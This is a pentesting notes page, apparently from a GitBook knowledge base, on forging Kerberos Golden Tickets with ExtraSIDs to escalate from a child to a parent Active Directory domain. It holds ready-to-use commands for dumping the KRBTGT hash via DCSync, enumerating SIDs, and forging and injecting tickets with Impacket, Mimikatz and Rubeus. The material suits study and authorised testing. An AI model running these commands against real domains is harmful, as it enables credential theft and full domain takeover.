RIO
  • Welcome
    • RIO
    • Useful Links
  • PENTESTING
    • Methodology
    • Protocols
      • FTP
      • SMB
      • NFS
      • SSH
      • RDP
      • SMTP
      • IMAP / POP3
      • RSYNC
      • SNMP
      • IPMI
      • R-Services
      • WinRM
      • WMI
      • LDAP
    • Databases
      • MySQL
      • MSSQL
      • Oracle TNS
      • PostgreSQL
    • File Transfers
      • Windows
      • Linux
      • Code
      • Misc
    • Password Attacks
      • John The Ripper
      • Hashcat
    • Docker
  • TOOLS
    • Nmap
    • Metasploit
    • BloodHound
    • Other
  • Linux
    • Theory
    • Commands and Utilities
      • Useful Commands
    • Bash Scripting
    • Post-Exploitation
      • Cred Hunting
      • Pivoting
    • Privilege Escalation
  • WINDOWS
    • Theory
      • Security
    • Commands and Utilities
    • PowerShell
    • Post-Exploitation
      • Tools
      • Enumeration
        • System
        • Network
        • Users
        • Groups
        • Processes / Services
        • Permissions
        • Defence
        • Programs
        • Files
      • Access
      • Pivoting
      • Cred Hunting
    • Privilege Escalation
      • Privileges
      • Built-In Groups
        • Backup Operators
        • Server Operators
        • Print Operators
        • DnsAdmins
        • Event Log Readers
      • Privilege Abuse
        • Potatoes
        • SeDebugPrivilege
        • SeTakeOwnershipPrivilege
      • MISC
        • UAC Bypass
        • User-Interaction Attacks
        • Weak Permissions
  • ACTIVE DIRECTORY
    • Theory
      • Terminology
    • Reconnaissance
      • Responder
      • Password Policies
      • DNS
      • Enumeration
        • Users
        • Groups
          • GPO's
        • Shares
        • Domain
        • Trusts
        • ACL
    • Movement
      • Credentials
        • Dumping
          • DCSync
        • Making a Target List
        • Spraying
        • Powershell Remoting
      • Kerberos
        • Kerbrute
        • Kerberoasting
          • Semi-Manual Way
          • Targeted Kerberoasting
        • ASREProasting
        • Forging
          • Golden Ticket
        • Overpass The Hash
        • Pass The Ticket
        • noPAC
      • MITM / Coerced Auths
        • LLMNR, NBT-NS Poisoning
        • PetitPotam
      • DACL Abuse
        • AddMember
        • ForceChangePassword
      • Trust Abuse
        • ExtraSIDs
      • ADCS
      • Printers
        • PrintNightmare
    • Tools
  • Networking
    • Theory
      • Types / Topologies
      • OSI & TCP/IP Models
      • TCP / UDP
      • MAC Addresses
      • IP / Subnetting
      • Proxies
      • ARP
    • Pivoting
      • Port-Forwarding
    • Commands and Utilities
    • Techniques
  • WEB
    • Web Recon
      • Fuzzing
    • DNS
  • CLOUD
    • Google GKE/GCP
      • Theory
Powered by GitBook
On this page
  • ABOUT
  • Prerequisites
  • LINUX
  • Preparing
  • Forging
  • All-In-One
  • WINDOWS
  • Preparing
  • Forging
  • RESOURCES
  1. ACTIVE DIRECTORY
  2. Movement
  3. Kerberos
  4. Forging

Golden Ticket

PreviousForgingNextOverpass The Hash

ABOUT

Golden Ticket is a forged Kerberos TGT that an attacker can create after obtaining the KRBTGT account hash from Active Directory, allowing them to impersonate any user, including domain administrators, and gain unrestricted access to services across the domain without the need for Active Directory to validate the user’s existence or group membership. The ticket contains a Privilege Attribute Certificate (PAC) that defines the user’s identity and privileges, which Windows trusts without cross-checking with the domain controller.

ExtraSIDs can be included in the PAC to simulate inherited privileges, such as previous group memberships, enabling privilege escalation even for accounts that no longer have those roles.

Prerequisites

  1. KRBTGT hash for the child domain (In example we are doing DCSync because for forging we need to have child domain fully compromised)

  2. SID for the child domain

  3. Name of a Target User in the child domain (does not need to exist! We can make a fake name, like "hacker")

  4. FQDN of the child domain

LINUX

Preparing

1. Obtaining the KRBTGT Account's NT Hash

impacket-secretsdump fia.militech.local/sreed@13.13.13.13 -just-dc-user FIA/krbtgt

2. Bruteforce SID's in Domain

First it enumerates Domain SID via LSARPC, then bruteforces last (RID) part

impacket-lookupsid fia.militech.local/sreed@13.13.13.13 | grep "Domain SID"

Forging

impacket-ticketer -nthash ffffffffffffffffffff -domain FIA.INLANEFREIGHT.LOCAL -domain-sid S-1-22-3334444-55555-666666 -extra-sid /sids:S-1-22-3334444-55555-666666-7331 hacker

Add Ticket to Memory

export KRB5CCNAME=hacker.ccache 

All-In-One

Impacket also has the tool raiseChild, which will automate escalating from child to parent domain. We need to specify the target domain controller and credentials for an administrative user in the child domain; the script will do the rest.

impacket-raiseChild -target-exec 13.13.13.13 FIA.MILITECH.LOCAL/sreed

WINDOWS

Preparing

1. Obtaining the KRBTGT Account's NT Hash

mimikatz # lsadump::dcsync /user:FIA\krbtgt

2. Get SID of Child Domain

PowerView

PS C:\> Get-DomainSID

Forging

Mimikatz

mimikatz # kerberos::golden /user:hacker /domain:FIA.MILITECH.LOCAL /sid:S-1-22-3334444-55555-666666 /krbtgt:ffffffffffffffffffff /sids:S-1-22-3334444-55555-666666-7331 /ptt

Rubeus

PS C:\> .\Rubeus.exe golden /rc4:ffffffffffffffffffff /domain:FIA.MILITECH.LOCAL /sid:S-1-22-3334444-55555-666666  /sids:S-1-22-3334444-55555-666666-7331 /user:hacker /ptt

Check Ticket in Memory

PS C:\> klist

RESOURCES

With same way you can grep groups you're interested in, or find common SID's in this site

Option /sids is for ExtraSIDs attack, explained here

[LINK]
[LINK]
[LINK]
Mimikatz and DCSync and ExtraSids, Oh Myharmj0y
Interesting Windows Computer & Active Directory Well-Known Security Identifiers (SIDs)Active Directory Security
Common SID's
Golden ticketsThe Hacker Recipes
https://venator17.gitbook.io/bibliotheque/active-directory/movement/trust-abuse/extrasidsvenator17.gitbook.io
Logo
Logo